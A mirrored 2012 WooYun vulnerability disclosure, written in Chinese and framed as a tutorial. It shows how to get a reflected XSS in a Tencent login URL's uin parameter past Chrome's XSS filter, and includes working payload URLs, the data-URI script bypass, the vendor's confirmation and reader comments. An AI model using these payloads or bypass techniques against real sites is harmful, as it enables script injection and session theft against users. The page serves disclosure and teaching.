1年前 (2016-10-27)  漏洞库 |   1 条评论  191 
文章评分 1 次,平均分 5.0
[收起] 文章目录

漏洞概要 关注数(53) 关注此漏洞

缺陷编号: WooYun-2012-16672

漏洞标题: [腾讯实例教程] 那些年我们一起学XSS - 17. XSS过滤器绕过 [通用绕过]

相关厂商: 腾讯

漏洞作者: 心伤的瘦子

提交时间: 2012-12-29 18:00

公开时间: 2013-02-12 18:00

漏洞类型: XSS 跨站脚本攻击

危害等级: 低

自评Rank: 2

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签: 反射型xss xss技巧



漏洞详情

披露状态:

2012-12-29: 细节已通知厂商并且等待厂商处理中
2012-12-31: 厂商已经确认,细节仅向厂商公开
2013-01-10: 细节向核心白帽子及相关领域专家公开
2013-01-20: 细节向普通白帽子公开
2013-01-30: 细节向实习白帽子公开
2013-02-12: 细节向公众公开

简要描述:

关于反射型的基本东西,暂时就到这啦,如果后面有什么好的case,再做增补。最近,有些人会问到怎么绕过浏览器的XSS过滤器,所以从这节开始,给出点绕过的例子。当然这些绕过浏览器的方法,不是万能的。不同浏览器,不同场景都会存在差异。满足场景要求时,才可以使用。

IE的一些绕过见乌云上的 @gainover,@sogili 的例子,我们教程就不再提及了。
此文给出的是一个来自sogili分享的chrome下绕过过滤器的方法,在腾讯某处XSS上的应用。

这一类都算是“结合了一定场景”,绕过了浏览器自身的防御机制,具有一定的通用性,我们称为“通用绕过”(瞎起的名字,别在意)。但是在后续版本的浏览器中,这些技巧可能会被浏览器干掉从而失效。再次强调:通用不是全部都行,意思是所适用的场景实际发生的概率比较高!

详细说明:

1. 其实就是个普通的XSS点,uin参数没有对任何字符进行过滤。

code 区域
<code>http://bangbang.qq.com/php/login?game=roco&uin="><img src=1 onerror=alert(1)>&world=5&roleid=44583443&level=8&role=%2</code>

2. 正是由于这个点什么都没过滤,浏览器自身的防御机制也最好发挥作用,瞧瞧,chrome拦截了。。

91.jpg

有的新手,不知道有过滤器的,更是会觉得 “啊,这是怎么回事,怎么不行啊,明明可以的。。”

我们只要看到console里有上面那句,就说明 chrome的过滤器大发神威了!!

3. 我们也看看源码。

92.jpg

危害部分被和谐了。

4. 那么怎么绕过呢? 这里直接说方法。

5. 首先要求缺陷点,允许 < , > 。其次,要求缺陷点的后方存在 标签。 我们看看当前的这个点的代码。

code 区域
<code>...<br />
<input type="hidden" id="sClientUin" value=""><img src=1 onerror=alert(1)>"><br />
...<br />
<script type="text/javascript" src="http://pingjs.qq.com/tcss.ping.js"></script><br />
...</code>

6. 可以看到上面的要求均满足。我们就可以使用以下技巧。

code 区域
<code><script src=data:,alert(1)<!--</code>

7. 代入到我们的利用代码里。

code 区域
<code>http://bangbang.qq.com/php/login?game=roco&uin="><script src=data:,alert(1)<!--&world=5&roleid=44583443&level=8&role=%2</code>

这次,我们就成功啦。

93.jpg

漏洞证明:

见详细说明

修复方案:

参见教程1

版权声明:转载请注明来源 心伤的瘦子@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-12-31 09:56

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价
(共4人评价):




登陆后才能进行评分

50%


0%


0%


0%


50%


评价

  1. 2012-12-29 18:02 |
    陈再胜
    ( 普通白帽子 |
    Rank:121 漏洞数:13 | 微博收收听~~~●﹏●)


    0

    终于大结局了······

  2. 2012-12-29 18:04 |
    心伤的瘦子
    ( 普通白帽子 |
    Rank:147 漏洞数:21 | 严肃点~ 此号为虚拟小号,并不存在实体...)


    0

    @陈再胜 不是大结局,前面只是反射型的说完了,接着还有存储型的。

  3. 2012-12-29 18:06 |
    鬼魅羊羔
    ( 普通白帽子 |
    Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)


    1

    @心伤的瘦子 @陈再胜 胖子的意思是说,第一季已经结束,第二季马上上映、、天天熬夜挖洞,写教程,胖子自然变瘦子。。。

  4. 2012-12-29 18:28 |
    Clar
    ( 路人 |
    Rank:5 漏洞数:2 | 当前无)


    0

    这篇应该很精彩!

  5. 2012-12-29 18:28 |
    se55i0n
    ( 普通白帽子 |
    Rank:1571 漏洞数:174 )


    0

    @心伤的瘦子 大湿呀,出来出呀~

  6. 2012-12-29 19:06 |
    D&G
    ( 普通白帽子 |
    Rank:780 漏洞数:158 | going)


    0

    @心伤的瘦子 @鬼魅羊羔 等第二季了~~

  7. 2012-12-29 19:13 |
    0x00de
    ( 路人 |
    Rank:8 漏洞数:6 | 一个二逼,2到家了的小白。)


    0

    又发了

  8. 2012-12-29 19:30 |
    dyun
    ( 普通白帽子 |
    Rank:102 漏洞数:15 | [code][/code])


    0

    哦周末 洞主不是不发么~~~

  9. 2012-12-29 19:52 |
    心伤的瘦子
    ( 普通白帽子 |
    Rank:147 漏洞数:21 | 严肃点~ 此号为虚拟小号,并不存在实体...)


    0

    @dyun 元旦前,是要上班的。 今天还没放假。

  10. 2012-12-29 20:41 |
    蟋蟀哥哥
    ( 普通白帽子 |
    Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)


    0

    flash xss可以绕过所有浏览器,刚好有个tencent的。。

  11. 2012-12-29 21:29 |
    心伤的瘦子
    ( 普通白帽子 |
    Rank:147 漏洞数:21 | 严肃点~ 此号为虚拟小号,并不存在实体...)


    1

    @蟋蟀哥哥 :) 说不定你手上的,已经被我报了,腾讯还未修复而已,哈。 这里的绕过,只是为了尽可能的增加一些鸡肋XSS的适用性。

  12. 2012-12-29 22:31 |
    Royal.
    ( 路人 |
    Rank:27 漏洞数:8 )


    0

    求放映地址

  13. 2012-12-30 02:26 |
    蟋蟀哥哥
    ( 普通白帽子 |
    Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)


    0

    @心伤的瘦子 尼玛。。缺德

  14. 2012-12-30 08:43 |
    鬼魅羊羔
    ( 普通白帽子 |
    Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)


    0

    @蟋蟀哥哥 二货,有东西赶紧报,小心被截胡的,我就犯二了一次,拍拍的XSS消息走漏了,同一天有三个人同时提交我那个XSS。。我差点抑郁了。。

  15. 2012-12-30 09:30 |
    px1624
    ( 普通白帽子 |
    Rank:1171 漏洞数:207 | px1624)


    0

    @鬼魅羊羔 我的人人网的也被截胡了。。。

  16. 2012-12-30 09:31 |
    px1624
    ( 普通白帽子 |
    Rank:1171 漏洞数:207 | px1624)


    0

    擦 全是腾讯的,这要私藏多少啊。。。

  17. 2012-12-30 12:43 |
    Errorera
    ( 普通白帽子 |
    Rank:112 漏洞数:21 | 我们应该在犯错误的情况下学习!)


    0

    @鬼魅羊羔 @鬼魅羊羔 是拍拍商户后台的编辑器img那里?

  18. 2013-01-30 11:28 |
    Kaier
    ( 路人 |
    Rank:11 漏洞数:1 )


    0

    终于能看了。嘎嘎

  19. 2013-08-06 13:53 |
    1428666
    ( 路人 |
    Rank:1 漏洞数:2 | script kid)


    0

    用手机百度搜索这边文章,经过转码后,您的alert(1) 弹窗了,具体位置在百度分享那里。这算不算跨站?

  20. 2013-08-07 10:07 |
    lxj616
    ( 普通白帽子 |
    Rank:455 漏洞数:92 | 来自喵星的太空喵)


    0

    @1428666 真的假的 我试试看

  21. 2013-08-07 10:10 |
    lxj616
    ( 普通白帽子 |
    Rank:455 漏洞数:92 | 来自喵星的太空喵)


    0

    @lxj616 http://wap.baidu.com/ssid=0/from=0/bd_page_type=1/uid=FDC1D3C95923C76664C364E1B8CB455B/baiduid=562387BF09D50D6B87C2740BCFD9B389/pu=sz%40224_220%2Cta%40middle____%2Cusm%400/w=0_10_%E9%82%A3%E4%BA%9B%E5%B9%B4%E6%88%91%E4%BB%AC%E4%B8%80%E8%B5%B7%E5%AD%A6XSS+-+17/t=wap/l=0/tc?ref=www_colorful&lid=5455767530950146704&order=2&vit=osres&tj=www_normal_2_0_10&sec=31778&di=441fcb453e4fcd5d&bdenc=1&nsrc=E-zV0QEptyoA_yixCFOxXnANedT62v3IEQGG_zdL0S3bo93saPOaUbBcVzTg2Sm5FEb7rXOEvBsFwXS707Uk8xN2

    1. 其实就是个普通的XSS点,uin参数没有对任何字符进行过滤。

    http://bangbang.qq.com/php/login?game=roco&uin=">&world=5&roleid=44583443&level=8&role=%2

    2. 正是由于这个点什么都没过滤,浏览器自身的防御机制也最好发挥作用,瞧瞧,chrome拦截了。。

    转义了?没有重现上述弹窗,请帖地址?

  22. 2013-08-08 23:33 |
    1428666
    ( 路人 |
    Rank:1 漏洞数:2 | script kid)


    0

    就是这篇文章,用手机查看的,电脑访问wap我试过无效,就是用手机看,就会弹出来。

  23. 2013-08-08 23:35 |
    1428666
    ( 路人 |
    Rank:1 漏洞数:2 | script kid)


    0

    @lxj616 就是这篇文章,用手机查看的,电脑访问wap我试过无效,就是用手机看,就会弹出来。

登录后才能发表评论,请先 登录



发表评论

  1. 谢谢

    test007 评论达人 LV.1 11个月前 (12-23) [1] [0]
切换注册

登录

忘记密码 ?

您也可以使用第三方帐号快捷登录

切换登录

注册

扫一扫二维码分享